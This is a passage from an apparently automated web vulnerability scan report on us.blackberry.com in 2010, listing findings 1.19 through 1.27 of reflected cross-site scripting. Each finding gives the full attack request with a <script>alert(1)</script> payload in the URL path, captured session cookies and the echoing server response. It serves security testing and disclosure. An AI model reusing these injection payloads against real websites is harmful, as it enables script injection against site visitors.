Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:21 GMT
Date: Wed, 24 Nov 2010 22:55:21 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/d8da1"><script>alert(1)</script>ddb678e61e4/" />
...[SNIP]...

1.19. http://us.blackberry.com/purchase/att/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/att/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d093"><script>alert(1)</script>98738b68f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/att8d093"><script>alert(1)</script>98738b68f5/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: us.blackberry.com
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:44 GMT
Date: Wed, 24 Nov 2010 22:55:44 GMT
Connection: close
Content-Length: 21884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/att8d093"><script>alert(1)</script>98738b68f5/" />
...[SNIP]...

1.20. http://us.blackberry.com/purchase/icon_games.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/icon_games.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429c4"><script>alert(1)</script>b1a68965cce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/429c4"><script>alert(1)</script>b1a68965cce HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:21 GMT
Date: Wed, 24 Nov 2010 22:55:21 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/429c4"><script>alert(1)</script>b1a68965cce/" />
...[SNIP]...

1.21. http://us.blackberry.com/purchase/icon_phone.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/icon_phone.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c05"><script>alert(1)</script>7afe2adac94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/b7c05"><script>alert(1)</script>7afe2adac94 HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:21 GMT
Date: Wed, 24 Nov 2010 22:55:21 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/b7c05"><script>alert(1)</script>7afe2adac94/" />
...[SNIP]...

1.22. http://us.blackberry.com/purchase/icon_software.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/icon_software.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12db3"><script>alert(1)</script>5608aa19322 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/12db3"><script>alert(1)</script>5608aa19322 HTTP/1.1
Accept: */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619569784}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.a=1290619570397; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:21 GMT
Date: Wed, 24 Nov 2010 22:55:21 GMT
Connection: close
Content-Length: 21880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/12db3"><script>alert(1)</script>5608aa19322/" />
...[SNIP]...

1.23. http://us.blackberry.com/purchase/united-states/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /purchase/united-states/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407ff"><script>alert(1)</script>61451fcce9d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /purchase/united-states407ff"><script>alert(1)</script>61451fcce9d/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:52 GMT
Date: Wed, 24 Nov 2010 22:55:52 GMT
Connection: close
Content-Length: 21906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/united-states407ff"><script>alert(1)</script>61451fcce9d/" />
...[SNIP]...

1.24. http://us.blackberry.com/smartphones/blackberrybold/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2acdf"><script>alert(1)</script>e1938d26bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrybold2acdf"><script>alert(1)</script>e1938d26bd/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253Aunited-states%25253APurchase%252520Smartphones%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fdevices%25252Fblackberrybold%25252Fbold_wheretobuy.jsp%2526ot%253DA%2526oi%253D612; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:11 GMT
Date: Wed, 24 Nov 2010 22:55:11 GMT
Connection: close
Content-Length: 21904


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold2acdf"><script>alert(1)</script>e1938d26bd/" />
...[SNIP]...

1.25. http://us.blackberry.com/smartphones/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/bold_wheretobuy.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a98b7"><script>alert(1)</script>c6d0ed4c239 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrybolda98b7"><script>alert(1)</script>c6d0ed4c239/bold_wheretobuy.jsp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253Aunited-states%25253APurchase%252520Smartphones%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fdevices%25252Fblackberrybold%25252Fbold_wheretobuy.jsp%2526ot%253DA%2526oi%253D612; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:45 GMT
Date: Wed, 24 Nov 2010 22:54:45 GMT
Connection: close
Content-Length: 21944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybolda98b7"><script>alert(1)</script>c6d0ed4c239/bold_wheretobuy.jsp" />
...[SNIP]...

1.26. http://us.blackberry.com/smartphones/blackberrybold/bold_wheretobuy.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/bold_wheretobuy.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcc57"><script>alert(1)</script>0698b7c6ab1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrybold/bcc57"><script>alert(1)</script>0698b7c6ab1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/united-states/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253Aunited-states%25253APurchase%252520Smartphones%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fdevices%25252Fblackberrybold%25252Fbold_wheretobuy.jsp%2526ot%253DA%2526oi%253D612; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:46 GMT
Date: Wed, 24 Nov 2010 22:54:46 GMT
Connection: close
Content-Length: 21908


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrybold/bcc57"><script>alert(1)</script>0698b7c6ab1/" />
...[SNIP]...

1.27. http://us.blackberry.com/smartphones/blackberrybold/wheretoDetails.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrybold/wheretoDetails.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299a7"><script>alert(1)</script>c0485080a3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrybold299a7"><script>alert(1)</script>c0485080a3f/wheretoDetails.jsp?cache=false&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrybold/#!where-to-buy
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619580850,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:47 GMT
Date: Wed, 24 Nov 2010 22:54:47 GMT
Connection: close
Content-Length: 21967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
